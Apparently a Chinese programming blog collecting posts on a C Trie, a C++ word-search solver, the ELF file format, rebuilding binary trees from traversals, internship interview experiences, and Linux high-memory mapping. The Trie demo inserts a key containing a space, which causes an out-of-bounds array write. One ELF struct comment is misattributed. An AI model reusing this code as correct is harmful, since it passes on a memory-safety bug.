下面给出一个Trie简易实现，根据下面的这幅图代码是很容易理解的。

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ALPHABET_SIZE 26

struct node
{
	int data;
	struct node *link[ALPHABET_SIZE];
};

struct node *create_node()
{
	struct node *q = (struct node*)malloc(sizeof(struct node));
	for (int i = 0; i < ALPHABET_SIZE; ++i)
	{
		q->link[i] = NULL;
	}
	q->data = -1;
	return q;
}

void insert_node(struct node* root, char *key)
{
	int length = strlen(key);
	
	struct node *q = root;
	int i = 0;
	for (i = 0; i < length; ++i)
	{
		int index = key[i] - 'a';
		if (q->link[index] == NULL)
		{
			q->link[index] = create_node();
		}
		q = q->link[index];
	}
	q->data = i;
}


int search(struct node *root, char *key)
{
	struct node *q = root;
	int length = strlen(key);
	int i = 0;
	for (i = 0; i < length; ++i)
	{
		int index = key[i] - 'a';
		if (q->link[index] != NULL)
			q = q->link[index];
		else
			break;
	}
	if (key[i] == '\0' && q->data != -1)
		return q->data;
	return -1;
}


void del(struct node *root)
{
	if(root == NULL)
		return;
	for (int i = 0; i < ALPHABET_SIZE; ++i)
	{
		del(root->link[i]);
	}
	free(root);
}
int main()
{
 	struct node *root = create_node();
	insert_node(root, "by");
	insert_node(root, "program");
	insert_node(root, "programming");
	insert_node(root, "data structure");
	insert_node(root, "coding");
	insert_node(root, "code");
	printf("Search value:%d\n", search(root, "code"));
	printf("Search value:%d\n", search(root, "geeks"));
	printf("Search value:%d\n", search(root, "coding"));
	printf("Search value:%d\n", search(root, "programming"));
	del(root);
}

Word Puzzles

主要思想就是先将单词建立起一颗Trie树，接着对字符方阵中的每个字符、每个方向进行暴力搜索，查找其是否存在于这颗Trie树中。因为个人不太喜欢用全局变量，就用C++写的，有一些C++11代码，还是觉得C++11代码太风骚。

输入如下：

20 20 10
QWSPILAATIRAGRAMYKEI
AGTRCLQAXLPOIJLFVBUQ
TQTKAZXVMRWALEMAPKCW
LIEACNKAZXKPOTPIZCEO
FGKLSTCBTROPICALBLBC
JEWHJEEWSMLPOEKORORA
LUPQWRNJOAAGJKMUSJAE
KRQEIOLOAOQPRTVILCBZ
QOPUCAJSPPOUTMTSLPSF
LPOUYTRFGMMLKIUISXSW
WAHCPOIYTGAKLMNAHBVA
EIAKHPLBGSMCLOGNGJML
LDTIKENVCSWQAZUAOEAL
HOPLPGEJKMNUTIIORMNC
LOIUFTGSQACAXMOPBEIO
QOASDHOPEPNBUYUYOBXB
IONIAELOJHSWASMOUTRK
HPOIYTJPLNAQWDRIBITG
LPOINUYMRTEMPTMLMNBO
PAFCOPLHAVAIANALBPFS
MARGARITA
ALEMA
BARBECUE
TROPICAL
SUPREMA
LOUISIANA
CHEESEHAM
EUROPA
HAVAIANA
CAMPONESA

20表示方阵大小，10表示单词大小

输出：坐标+方向

15 G
11 C
18 A
8 C
13 B
15 E
3 D
1 E
7 C
11 H

下面是代码

#include <iostream>
#include <fstream>
#include <vector>
#include <algorithm>
#include <iterator>
#include <string>
#include <tuple>

using namespace std;

struct Node
{
	int data;
	struct Node *child[26];
};

class WordPuzzles
{
public:
	
	WordPuzzles(ifstream &in);
	void insert_node(string word, int num);
	void search_words(int x, int y, int dir);
	void do_work();
private:

	Node *create_node()
	{
		Node *q = new Node();
		q->data = -1;
		for (int i = 0; i < 26; ++i)
		{
			q->child[i] = NULL;
		}
		return q;
	}

	static int dx[8];//方向
	static int dy[9];
	int row, col, counts;
	vector<string> wordmap, words;
	vector<tuple<int, int, int, char>>  ans; 
	Node *root;
};

int WordPuzzles::dx[] = { -1, -1, 0, 1, 1, 1, 0, -1 };
int WordPuzzles::dy[] = { 0, 1, 1, 1, 0, -1, -1, -1 };

WordPuzzles::WordPuzzles(ifstream &in)
{
	in >> row >> col >> counts;
	printf("the row is:%d,col is:%d,counts is:%d\n", row, col, counts);
	for (int i = 0; i < row; ++i)
	{
		string str;
		in >> str;
		wordmap.push_back(str);
	}
	cout << "the map is " << endl;
	copy(wordmap.begin(), wordmap.end(), ostream_iterator<string>(cout, "\n"));

	for (int i = 0; i < counts; ++i)
	{
		string str;
		in >> str;
		words.push_back(str);
	}
	cout << "the words is " << endl;
	copy(words.begin(), words.end(), ostream_iterator<string>(cout, "\n"));


	root = create_node();

	for (vector<string>::iterator it = words.begin(); it != words.end(); ++it)
	{
		insert_node(*it, it - words.begin());
	}
}

void WordPuzzles :: insert_node(string word, int num)
{
	Node *q = root;
	for (int i = 0; i < word.size(); ++i)
	{
		int index = word[i] - 'A';
		if (q->child[index] == NULL)
		{
			q->child[index] = create_node();
		}
		q = q->child[index];
	}
	q->data = num;
}


void WordPuzzles::search_words(int x,int y,int dir)
{
	Node *q = root;
	int xtmp = x, ytmp = y;
	while (xtmp >= 0 && xtmp < row && ytmp >= 0 && ytmp < col)
	{
		if (!q->child[wordmap[xtmp][ytmp] - 'A'])
			break;
		else
			q = q->child[wordmap[xtmp][ytmp] - 'A'];
		if (q->data != -1)
		{
			
			ans.push_back(make_tuple(q->data,x, y, dir));
			q->data = -1;
			
		}
		xtmp += dx[dir];
		ytmp += dy[dir];
	}
}

void WordPuzzles::do_work()
{
	for (int i = 0; i < row; ++i)
	{
		for (int j = 0; j < col; ++j)
		{
			for (int k = 0; k < 8; ++k)
				search_words(i, j, k);
		}
	}

	sort(ans.begin(), ans.end(),
		[](const tuple<int, int, int, char>& a, const tuple<int, int, int, char> &b)
	{
		return get<0>(a) < get<0>(b);
	});

	for (auto &it : ans)
	{
		cout << get<1>(it) << " " << get<2>(it) << " " << (char)(get<3>(it) +'A') << endl;
	}
}

int main()
{
	
	
	ifstream in("word.txt");
	WordPuzzles wp(in);
	wp.do_work();
	
}

ELF文件格式简介

2014-11-02T00:00:00+00:00

ELF代表Executable and Linkable Forma，是一种对可执行文件、目标文件和库使用的文件格式，跟Windows下的PE文件格式类似。ELF格式是是UNIX系统实验室作为ABI（Application Binary Interface）而开发和发布的，早已经是Linux下的标准格式了。本文使用如下的简单程序来具体讲述ELF文件的格式，建议对照着程序的二进制码阅读本文。

#include <stdio.h>

int add(int a,int  b)
{
    printf("Number are added together\n");
    return a + b;
}

int main()
{
    int a,b;
    a = 3;
    b = 4;
    int ret = add(a,b);
    printf("Result:%u\n",ret);
    exit(0);
}

gcc test.c -o test
gcc test.c -c -o test.o

一. ELF概述

ELF主要包括三种类型文件：

可重定位文件(relocatable)：编译器和汇编器产生的.o文件，被Linker所处理
可执行文件(executable)：Linker对.o文件进行处理输出的文件，进程映像
共享对象文件(shared object)：动态库文件.so

下面是三种类型的示例:

ELF的布局如下：

由图可以知道，ELF文件从概念上来说包括了5个部分：

ELF header，描述体系结构和操作系统等基本信息，指出section header table和program header table在文件的位置
program header table，这个是从运行的角度来看ELF文件的，主要给出了各个segment的信息，在汇编和链接过程中没用
section header table，这个保存了所有的section的信息，这是从编译和链接的角度来看ELF文件的
sections，就是各个节区
segments，就是在运行时的各个段

注意，经过上面解释我们可以看到，其实sections和segments占的一样的地方。这是从链接和加载的角度来讲的。左边是链接视图，右边是加载视图，sections是程序员可见的，是给链接器使用的概念，而segments是程序员不可见的，是给加载器使用的概念。一般是一个segment包含多个section。Windows的PE就没有这个program header table和section header table点都统一为section，只是在加载时会进行处理。所以program header table和section header table都是可选的。

二. ELF的组成结构

在介绍这部分之前，前把定义中的各个类型数据结构的大小放在这里。

(1) ELF header

ELF Header描述了体系结构和操作系统等基本信息,并指出Section Header Table和Program Header Table在文件中的什么位置，每个成员的解释参见注释。

#define EI_NIDENT 16
typedef struct{
    /*ELF的一些标识信息，固定值*/
    unsigned char e_ident[EI_NIDENT];
    /*目标文件类型：1-可重定位文件，2-可执行文件，3-共享目标文件等*/
    Elf32_Half e_type;
    /*文件的目标体系结构类型：3-intel 80386*/
    Elf32_Half e_machine;
    /*目标文件版本：1-当前版本*/
    Elf32_Word e_version;
    /*程序入口的虚拟地址，如果没有入口，可为0*/
    Elf32_Addr e_entry;
    /*程序头表(segment header table)的偏移量，如果没有，可为0*/
    Elf32_Off e_phoff;
    /*节区头表(section header table)的偏移量，没有可为0*/
    Elf32_Off e_shoff;
    /*与文件相关的，特定于处理器的标志*/
    Elf32_Word e_flags;
    /*ELF头部的大小，单位字节*/
    Elf32_Half e_ehsize;
    /*程序头表每个表项的大小，单位字节*/
    Elf32_Half e_phentsize;
    /*程序头表表项的个数*/
    Elf32_Half e_phnum;
    /*节区头表每个表项的大小，单位字节*/
    Elf32_Half e_shentsize;
    /*节区头表表项的数目*/
    Elf32_Half e_shnum;
    /*某些节区中包含固定大小的项目，如符号表。对于这类节区，此成员给出每个表项的长度字节数。*/
    Elf32_Half e_shstrndx;
}Elf32_Ehdr;

这里简单解释一下最后一个字段e_shstrndx的含义，“e_shstrndx”是Elf32_Ehdr的最后一个成员，它是“Section header string table index”的缩写。我们知道段表字符串表本身也是ELF文件中的一个普通的段，知道它的名字往往叫做“.shstrtab”。那么这个“e_shstrndx”就表示“.shstrtab”在段表中的下标，即段表字符串表在段表中的下标。

下面是test的ELF header结构各个数据成员对应的值:

可以看到这个ELF的基本信息，比如，体系结构和操作系统，Section header table中有30个section，从4420开始，每个40个字节，Program header table中有9个segment，每个32字节。下面再从字节码上面看看具体的。标出了某些结构，可以对照上面的结构看。

(2) program header table与grogram header entry

程序头表是从加载的角度来看ELF文件的，目标文件没有该表，每一个表项提供了各段在虚拟地址空间和物理地址空间的大小、位置、标志、访问权限和对其方面的信息。从上面知道，test中有9个segment，如下图：

下面对其中的一些进行简单的介绍。

PHDR保存程序头表
INTERP指定在程序已经从可执行文件映射到内存之后，必须调用的解释器。在这里，解释器并不意味着二进制文件的内容必须由另一个程序解释。它指的是这样一个程序：通过链接其他库，来满足未解决的引用。通常/lib/ld-linux.so.2、/lib/ld-linux-ia-64.so.2等库，用于在虚拟地址空间中插入程序运行所需要的动态库。对几乎所有的程序来说，可能C标准库都是必须映射的。还需要添加的各种库包括,GTK、数学库、libjpeg等等
LOAD表示一个需要从二进制文件映射到虚拟地址空间的段。其中保存了常量数据（如字符串），程序的目标代码等。
DYNAMIC段保存了由动态链接器（即，INTERP中指定的解释器）使用的信息。
NOTE保存了专有信息

一个entry对应一个segment，由如下的数据结构表示

typedef struct
{
    /*segment的类型：PT_LOAD= 1 可加载的段*/
    Elf32_Word p_type;
    /*从文件头到该段第一个字节的偏移*/
    Elf32_Off p_offset;
    /*该段第一个字节被放到内存中的虚拟地址*/
    Elf32_Addr p_vaddr;
    /*在linux中这个成员没有任何意义，值与p_vaddr相同*/
    Elf32_Addr p_paddr;
    /*该段在文件映像中所占的字节数*/
    Elf32_Word p_filesz;
    /*该段在内存映像中占用的字节数*/
    Elf32_Word p_memsz;
    /*段标志*/
    Elf32_Word p_flags;
    /*p_vaddr是否对齐*/
    Elf32_Word p_align;
} Elf32_phdr;

(3) section header table与section header entry

节表头包含了文件中的各个节，每个节都指定了一个类型，定义了节数据的语义。各节都指定了大小和在二进制文件内部的偏移。从上面知道,test中有30个section，如下图：

下面对其中的一些进行简单的介绍:

.interp保存了解释器的文件名，这是一个ASCII字符串
.data保存初始化的数据，这是普通程序数据一部分，可以再程序运行时修改
.rodata保存了只读数据，可以读取但不能修改。例如，编译器将出现在printf语句中的所有静态字符串封装到该节
.init和.fini保存了进程初始化和结束所用的代码，这两个节通常都是由编译器自动添加
.gnu.hash是一个散列表，允许在不对全表元素进行线性搜索的情况下，快速访问所有的符号表项

section的结构定义如下：

typedef struct{
/*节区名称*/
Elf32_Word sh_name;
/*节区类型：PROGBITS-程序定义的信息，NOBITS-不占用文件空间(bss),REL-重定位表项*/
Elf32_Word sh_type;
/*每一bit位代表一种信息，表示节区内的内容是否可以修改，是否可执行等信息*/
Elf32_Word sh_flags;
/*如果节区将出现在进程的内存影响中，此成员给出节区的第一个字节应处的位置*/
Elf32_Addr sh_addr;
/*节区的第一个字节与文件头之间的偏移*/
Elf32_Off sh_offset;
/*节区的长度，单位字节，NOBITS虽然这个值非0但不占文件中的空间*/
Elf32_Word sh_size;
/*节区头部表索引链接*/
Elf32_Word sh_link;
/*节区附加信息*/
Elf32_Word sh_info;
/*节区带有地址对齐的约束*/
Elf32_Word sh_addralign;
/*某些节区中包含固定大小的项目，如符号表，那么这个成员给出其固定大小*/
Elf32_Word sh_entsize;
}Elf32_Shdr;

这就是ELF的大致结构了，有时间再对几个比较重要的节表进行总结。

遍历序列确定二叉树

2014-10-30T00:00:00+00:00

我们知道二叉树的遍历一般分为三种（前序、中序、后序），现在的问题是根据任意两种遍历序列确定这颗二叉树。一般的，“前序+中序”，“中序+后序”的模式都能唯一确定二叉树，而“前序+后序”是不能唯一确定二叉树的。这篇文章从信息论的角度从定性的角度说明了这个问题。（下面大部分都是从网上看来的，自己做了一个综合而已）

下面我们对这三种情况分别进行讨论。

一. 已知二叉树的前序序列和中序序列

1、确定树的根节点。树根是当前树中所有元素在前序遍历中最先出现的元素。

2、求解树的子树。找出根节点在中序遍历中的位置，根左边的所有元素就是左子树，根右边的所有元素就是右子树。若根节点左边或右边为空，则该方向子树为空；若根节点左边和右边都为空，则根节点已经为叶子节点。

3、递归求解树。将左子树和右子树分别看成一棵二叉树，重复1、2、3步，直到所有的节点完成定位。

二、已知二叉树的后序序列和中序序列

1、确定树的根。树根是当前树中所有元素在后序遍历中最后出现的元素。

3、递归求解树。将左子树和右子树分别看成一棵二叉树，重复1、2、3步，直到所有的节点完成定位。

下面是代码

#include "stdafx.h"
#include <stdlib.h>
#include <stdio.h>
#include <string.h>


typedef struct _node
{
     int v;
     struct _node* left;
     struct _node* right;
}node;

char pre[50] = "ABDHLEKCFG";
char mid[50] = "HLDBEKAFCG";
char post[50] = "LHDKEBFGCA";

int Possition(char c)
{
     return strchr(mid,c) - mid;
}
node* root1;//这里弄成全局变量主要是为了调试
node* root2;

//i: 子树的前序序列字符串的首字符在pre[]中的下标
//j: 子树的中序序列字符串的首字符在mid[]中的下标
//len: 子树的字符串序列的长度

void PreMidCreateTree(node **root,int i,int j,int len)
{
     int m;
     if(len <= 0)
          return;
     *root = (node*)malloc(sizeof(node));
     (*root)->v = pre[i];
     (*root)->left = NULL;
     (*root)->right = NULL;
     m = Possition(pre[i]);
     PreMidCreateTree(&((*root)->left),i+1,j,m-j);//确定递归区间要非常注意，仔细体会
     PreMidCreateTree(&((*root)->right),i+(m-j)+1,m+1,len-1-(m-j));
}


//i: 子树的后序序列字符串的尾字符在post[]中的下标
//j: 子树的中序序列字符串的首字符在mid[]中的下标
//len: 子树的字符串序列的长度

void MidPostCreateTree(node **root,int i,int j,int len)
{
     int m;
     if(len <= 0)
          return;
     *root = (node*)malloc(sizeof(node));
     (*root)->v = post[i];
     (*root)->left = NULL;
     (*root)->right = NULL;
     m = Possition(post[i]);
     MidPostCreateTree(&((*root)->left),i-1-(len-1-(m-j)),j,m-j);
     MidPostCreateTree(&((*root)->right),i-1,m+1,len-1-(m-j));
}

void PreOrder(node *root)
{
     if(root)
     {
          printf("%c",root->v);
          PreOrder(root->left);
          PreOrder(root->right);
     }
}

void PostOrder(node *root)
{
     if(root)
     {
          PostOrder(root->left);
          PostOrder(root->right);
          printf("%c",root->v);
     }
    
}

int main()
{
     node  *root2= NULL;
     PreMidCreateTree(&root1, 0, 0, strlen(mid));
     PostOrder(root1); 
     printf("\n");
     MidPostCreateTree(&root2, strlen(post)-1, 0, strlen(mid));
     PreOrder(root2);
     printf("\n");
     return 0;
}

三. 已知二叉树的前序序列和后序序列

这种情况下一般不能唯一确定一颗二叉树，但是可以确定有多少种二叉树的可能形态。

思路如下：我们先看一个简单例子，前序序列为ABCD，后序序列为CBDA

（1）前序遍历和后序遍历的最后一个字母必定是根，即都是 A

（2）前序遍历的第二个字母是 B 也必定是某颗子树的根（左右无法确定）。那么 B 在后序遍历中一定出现在它所在子树的最后，因此我们可以通过查找 B 在后序遍历中的位置来得到左子树的所有节点，即为 B 和 C ，剩下的 D 就是右子树的节点了

（3）分别用同样的方法分析左子树 BC 及右子树 D ， D 只有一个根，形态是唯一的， BC 只有一颗子树，它可以是左也可以是右

（4）最后看看有多少个节点（假设是 n ）是只有一颗子树的，用乘法 pow (2,n)就是结果

下面推广到所有的二叉树

首先我们需要设几个变量：

pre[50]; // 前序遍历的数组
post[50]; // 后序遍历的数组
length; // 数组的长度
count; // 记录只有一个子树的节点的个数

(1) 如果 length == 1 ，显然结果唯一

(2) 当顶点多余 1 时，说明存在子树，必然有 pre[0]==post[length-1]; 如果 pre[1] == post[length-2]; 说明从 1 到 length-1 都是 PreStr[0] 的子树，至于是左还是右就无法确定，此时 count++ 。对剩下的 pre[1] 到 pre[length-1] 与 post[0] 到 post[length-2] 作为一颗新树进行处理

(3) 如果 pre[1] != post[length-2], 显然存在左右子树 (post 中以与 pre[1] 相等的位置分为左右子树 ) ，对左右子树分别作为一颗独立的子树进行处理

#include <stdio.h>
#include <stdlib.h>


char pre[50];//= "ABDHLEKCFG";
char mid[50];//= "HLDBEKAFCG";
char post[50];//= "LHDKEBFGCA";
int count;
void calc(int prebeg,int preend,int postbeg,int postend)
{
     int i;
     if(prebeg>=preend)
          return;
     for(i = postbeg; i <= postend - 1; ++i)
     {
          if(pre[prebeg+1]==post[i])
               break;
     }
     if(i == postend - 1)
          count++;
     calc(prebeg+1,prebeg+1+(i-postbeg),postbeg,i);
     calc(prebeg+1+(i-postbeg)+1,preend,i+1,postend-1);
}

int Pow(int n)
{
    int i;
    int m = 1;

    for(i = 0; i < n; i++)
    {
        m *= 2;
    }

    return m;
}

int main()
{
     int length;
    scanf("%s", pre);
    scanf("%s", post);

    length = strlen(pre);
    count = 0;

    calc(0,length-1,0,length-1);
    printf("%d\n", Pow(count));
    return 0;
}

Intel和VMware应聘小记

2014-10-29T00:00:00+00:00

上周二（10.21）回学校，路过校门口偶然一瞥看到Intel的笔试通知，说带上中英文简历就可以，然后想着明年就工作可以先去看看。知道外企都有长期的实习招聘，说不定混个实习呢。

Intel的笔试人很少，估计是因为招的人少没怎么做宣传的缘故。笔试题是中文的，很基础，很明显就是底层的，纯C，系统ring 0 ring 3等简单常识,，基本的算法题，附加题是英文的也简单。第二天很顺利的去面试，结果面试官对虚拟化这块不熟，我就跟他给他讲Xen、KVM讲了好久。他好像对漏洞利用比较有兴趣，又从Windows漏洞利用与对抗讲起。他后来来一句”操作系统“我就不问你了啊”，我说“随意吧”。整个过程还是表现出满满的自信的。他对我还是挺满意的，直接就说拿个intern没问题，然后跟manager说了一下我的情况，manager想跟我整了段英文，我这个口语真是要了命。还好是技术的，勉强过了。临走，manager说有合适的intern通知我，我想着可能没戏了，我实在是我的英语口语没什么信心。结果第二天就来了Intel那边hr就来了通知。马来西亚，大连，上海都来了电话，当时想着这个外企还真是挺麻烦的。后来知道上海那个是manager，她问了我为什么这么早（我说明年才能过去），还说她们是有校招名额的。这个Intel真是挺有效率的，周二笔试，周三笔试，周四发通知，剩下的就是走流程，这么早，体检都给我安排好了。基本上实习就定在Intel了吧。

下面再说说VMware，这个公司我一直是很看好的。作为云计算的底层平台，我对虚拟化技术在今后几年的发展非常看好。去年就参加了VMware的校园招聘，因为才研一，不管是工作还是实习都不可能，打着酱油进了2面，坦诚自己非应届，也不能实习，面试官也没怎么说我，让我以后实习可以去试试。VMware的笔试全英文，比较全面，也比较有难度，比如今年还考了shellshock漏洞。当然，因为内功还行，前面选择部分还行，这次就有2个编程题不会。以为跪在笔试上了，结果周一通知今天去面试。今天去面试情况挺糟糕的，这也是促使我写下这篇文章的原因。感觉上午就像没有清醒一样，一个memcpy竟然没有检查NULL指针，我也是醉了。我说做过windows kernel driver的开发，结果面试官以来就问，Windows的启动流程。我又是支支吾吾，确实是有点忘了，并且我之前的工作是偏向于安全的，对这个确实没怎么自习看。一上来就感觉不太好了。之后让我解释内核NULL Pointer的原因，我也是说得不太仔细，就连异常发生时候，error code压栈里面有一位表示异常发生的位置（内核态/用户态）这个都说得不够自信。总之吧，整个面试感觉自己表现得非常不好，算是这么多年面试最差的一次。VMware估计是跪了，想起去年一面、二面充满自信的自己，真的是挺大一讽刺。

这两次面试一个顺利得超乎我想象，一个狼狈得超乎想象。顺利的就不说了，狼狈的VMware告诉我还是要好好做好准备，这些年的努力并没有白费，不过要善于表达。我觉得挺好的，在我觉得什么都很顺的情况下，来这么一次。恩，继续加油。

Linux内存管理概述

2014-10-12T00:00:00+00:00

一. Linux内核地址空间划分

Linux操作系统将虚拟地址空间4G中低3G是分给用户进程使用，高1G分给内核使用。虽然（在两个用户进程之间的）上下文切换期间会改变低地址部分，但是高地址空间的内核部分总是保持不变。MMU在进行寻址的时候都是使用的虚拟地址，内核当然也不例外。Linux为了简单，将物理内存0开始的部分内存直接映射到了它的虚拟地址开始的地方，也就是0xc0000000，这样做是很方便的，在内核中使用0xc0000001就相当于物理访问物理单元1。但是，这样问题就来了，内核只能直接寻址1G的虚拟地址空间，即使是全部映射完，也只能访问1G物理内存。所以如果一个系统有超过1G的物理内存，在某一时刻，必然有一部分内核是无法直接访问到的。另外，内核除了访问内存外，还需要访问很多IO设备。在现在的计算机体系结构下，这些IO设备的资源（比如寄存器，片上内存等）一般都是通过MMIO的方式映射到物理内存地址空间来访问的，就是说内核的1G地址空间除了映射内存，还要考虑到映射这些IO资源，换句话说，内核还需要预留出一部分虚拟地址空间用来映射这些IO设备。考虑到这些特殊用途，Linux内核只允许直接映射896M的物理内存，而预留了最高端的128M虚拟地址空间另作他用。所以当系统有大于896M内存时，超过896M的内存时，内核就无法直接访问到了，这部分内存就是所谓的高端内存（high memory）。那内核就永远无法访问到超过896M的内存了？当然不适合，内核已经预留了128M虚拟地址，我们可以用这个地址来动态的映射到高端内存，从而来访问高端内存。所以预留的128M除了映射IO设备外，还有一个重要的功能是提供了一种动态访问高端内存的一种手段。当然，在系统物理内存<896M，比如只有512M的时候，就没有高端内存了，因为512M的物理内存都已经被内核直接映射。事实上，在物理内存<896M时，从3G+max_phy ~ 4G的空间都作为上述的预留的内核地址空间。ULK上来第二章就直接出来896M内核页表很是让人迷惑，只有搞清楚了高端内存的概念才能完全理解。需要注意的是，只有内核自身使用高端内存页，对用户空间进程来说，高端页和普通内存页完全没有区别，用户空间进程总是通过页表访问内存，而不是直接访问。下图展示的是内核地址的空间划分。

PAGE_OFFSET即是0xc0000000，前面物理内存896M是直接映射到内核地址空间，之后的就是高端内存了，高端内存划分为3部分：VMALLOC_START~VMALLOC_END、KMAP_BASE~FIXADDR_START和FIXADDR_START~4G。对于高端内存，可以通过 alloc_page() 或者其它函数获得对应的 page，但是要想访问实际物理内存，还得把 page 转为线性地址才行，也就是说，我们需要为高端内存对应的 page 找一个线性空间，这个过程称为高端内存映射，这个我们第三节再讲。

二. 页框与内存区简介

页框是Linux内存管理的最小的单位，就是一个4KB的内存区。页框的信息都存放在一个类型为page的页描述符中，所有的页描述符存放在mem_map数组中。注意这是对所有物理内存而言的。整个内存划分为结点(node)，每个结点关联到系统中的一个处理器，在内核中表示为pg_data_t的实例。各个结点又划分为内存域（zone），这是内存的进一步细分。大致结构如下：

Linux把每个内存结点的物理内存划分为3个管理区，ZONE_DMA、ZONE_NORMAL、ZONE_HIGHMEM。其范围分别为：

字段名	说明
ZONE_DMA	低于16MB的内存页框
ZONE_NORMAL	高于16MB但地狱896MB的内存页框
ZONE_HIGHMEM	高于896MB的内存页框

x86下的Linux使用一致访问内存(UMA)模型，因此Linux中只有一个单独的节点，包含了系统中所有的物理内存。

三. 高端内存页框的映射

为了使内核访问到高于896M的物理内存，必须将高端内存的页框映射到内核地址空间，Linux使用永久内核映射、临时内核映射以及非连续内存分配。

永久内核映射

永久内核映射允许内核建立高端页框到内核地址空间的长期映射，它们使用主内核页表中一个专门的页表，其地址存放在pkmap_page_table变量中。页表中的表项数由LAST_PKMAP宏产生。页表包含512或1024项，这取决于PAE机制是否被激活。因此，内核最多一次性访问2M或4M的高端内存。页表映射的线性地址从PKMAP_BASE开始，pkmap_count数组包含LAST_PKMAP个计数器，pkmap_page_table页表中的每一个项都有一个。计数器可能为0、1或大于1。

如果计数器为0，则说明对应的页表项没有映射任何高端内存，所以是可用的。
如果计数器为1，则说明对应的页表项没有映射任何高端内存，但是不能被使用，因为自从它最后一次使用以来，其TLB表项还未被刷新。
如果计数器大于1，则说明映射一个高端内存页框，这意味着正好有n-1个内核成分在使用这个页框。

为了记录高端内存页框与永久内核映射包含的线性地址之间的联系，内核使用page_address_htable做散列表，它使用page_address_map数据结构用于为高端内存中的每一个页框进行映射。

struct page_address_map {
    struct page *page;
    void *virtual;
    struct list_head list;
};

page_address()函数返回页框对应的线性地址，如果页框在高端内存中并且没有被映射，则返回NULL。如果页框不在高端内存中，就通过lowmem_page_address返回线性地址。如果在高端内存中，则通过函数page_slot在page_address_htable中查找，如果在散列表中查找到，就返回线性地址。

kmap()用来建立内存区映射，代码如下：

void *kmap(struct page *page){
    might_sleep();
    if (!PageHighMem(page))
        return page_address(page);
    return kmap_high(page);
};

本质上如果是高端内存区域，则使用kmap_high()函数用来建立高端内存区的永久内核映射，代码如下：

void *kmap_high(struct page *page)
{
    unsigned long vaddr;

    /*
     * For highmem pages, we can't trust "virtual" until
     * after we have the lock.
     */
    lock_kmap();
    vaddr = (unsigned long)page_address(page);
    if (!vaddr)
        vaddr = map_new_virtual(page);
    pkmap_count[PKMAP_NR(vaddr)]++;
    BUG_ON(pkmap_count[PKMAP_NR(vaddr)] < 2);
    unlock_kmap();
    return (void*) vaddr;
};

临时内存映射

说到临时内存映射就要说到固定映射的线性地址，就是第一张图的最后一部分。固定映射的线性地址（fix-mapped linear address）基本上是一种类似于0xffffc000这样的常量线性地址，其对应的物理地址不必等于线性地址减去0xc0000000，而是可以以任意方式建立。因此，每个固定映射的线性地址都映射一个物理内存的页框。

高端内存的任意一页框都可以通过一个“窗口”（为此而保留的一个页表项）映射到内核地址空间。每个CPU都有它自己包含的13个窗口集合，它们用enum km_type数据结构表示。

enum km_type {
KMAP_D(0)   KM_BOUNCE_READ,
KMAP_D(1)   KM_SKB_SUNRPC_DATA,
KMAP_D(2)   KM_SKB_DATA_SOFTIRQ,
KMAP_D(3)   KM_USER0,
KMAP_D(4)   KM_USER1,
KMAP_D(5)   KM_BIO_SRC_IRQ,
KMAP_D(6)   KM_BIO_DST_IRQ,
KMAP_D(7)   KM_PTE0,
KMAP_D(8)   KM_PTE1,
KMAP_D(9)   KM_IRQ0,
KMAP_D(10)  KM_IRQ1,
KMAP_D(11)  KM_SOFTIRQ0,
KMAP_D(12)  KM_SOFTIRQ1,
KMAP_D(13)  KM_SYNC_ICACHE,
KMAP_D(14)  KM_SYNC_DCACHE,
KMAP_D(15)  KM_UML_USERCOPY,
KMAP_D(16)  KM_IRQ_PTE,
KMAP_D(17)  KM_NMI,
KMAP_D(18)  KM_NMI_PTE,
KMAP_D(19)  KM_TYPE_NR
};

km_type中的每个符号（除了最后一个）都是固定映射的线性地址的一个下标。为了建立临时内核映射，内核调用kmap_atomic()函数。在后来的内核代码中，kmap_atomic()函数只是使用了kmap_atomic_prot。

void *kmap_atomic_prot(struct page *page, enum km_type type)
{
    unsigned int idx;
    unsigned long vaddr;
    void *kmap;

    pagefault_disable();
    if (!PageHighMem(page))
        return page_address(page);

    debug_kmap_atomic(type);

    kmap = kmap_high_get(page);
    if (kmap)
        return kmap;

    idx = type + KM_TYPE_NR * smp_processor_id();
    vaddr = __fix_to_virt(FIX_KMAP_BEGIN + idx);
#ifdef CONFIG_DEBUG_HIGHMEM
    BUG_ON(!pte_none(*(TOP_PTE(vaddr))));
#endif
    set_pte_ext(TOP_PTE(vaddr), mk_pte(page, kmap_prot), 0);
    local_flush_tlb_kernel_page(vaddr);

    return (void *)vaddr;
}

非连续内存分配

如果内核能够找到连续的页，那是最好的，这样分配和释放都会比较简单，但是真实的系统里情况往往不是那么简单。在分配一大块内存时，可能竭尽全力也无法找到连续的内存块，在用户空间中这不是问题，因为普通进程设计为使用处理器的分页机制，当然这也会降低速度并占用TLB。

为非连续内存区保留的线性地址空间从VMALLOC_START到VMALLOC_END。

每个vmalloc分配的子区域都是自包含的，与其他vmalloc子区域通过一个内存页分隔，类似于直接映射和vmalloc区域之间的边界，不同vmalloc子区域之间的分隔也是为防止不正确的内存访问操作。这种情况只会因为内核故障出现，应该通过系统错误信息报告，而不是允许内核其他部分的数据被暗中修改，因为分隔是在虚拟地址空间中建立的，不会浪费物理内存页。

vmalloc是一个接口函数，内核代码使用它来分配在虚拟内存中连续但在物理内存中不一定连续的内存。这个函数只需要一个参数，用于指定所需内存区的长度，不过其长度单位不是页而是字节，这在用户空间程序的设计中是很普遍的。

使用vmalloc的最著名的实例是内核对模块的实现，因为模块可以在任何时候加载，如果模块数据比较多，那么无法保证有足够的连续内存可用，特别是在系统已经运行了比较长时间的情况下。如果能够用小块内存拼接出足够的内存，那么就可以使用vmalloc。

因为用于vmalloc的内存页总是必须映射在内核地址空间中，因此使用ZONE_HIGHMEM内存域的页要优于其他内存域，这使得内核可以节省更宝贵的较地段内存域又不会带来额外的坏处。所以，vmalloc是内核出于自身的目的使用高端内存页的少数情况之一。

内核在管理虚拟内存中的vmalloc区域时，必须跟踪哪些子区域被使用，哪些是空闲的，所以定义了一个vm_struct的数据结构，并将所有使用的部分保存在一个链表中。

struct vm_struct {
    struct vm_struct    *next;
    void                *addr;
    unsigned long       size;
    unsigned long       flags;
    struct page         **pages;
    unsigned int        nr_pages;
    unsigned long       phys_addr;
    void                *caller;
}; 内核通过vmalloc()来申请非连续的物理内存，若申请成功，该函数返回连续内存区的起始地址，否则，返回NULL。vmalloc()和kmalloc()申请的内存有所不同，kmalloc()所申请内存的线性地址与物理地址都是连续的，而vmalloc()所申请的内存线性地址连续而物理地址则是离散的，两个地址之间通过内核页表进行映射。

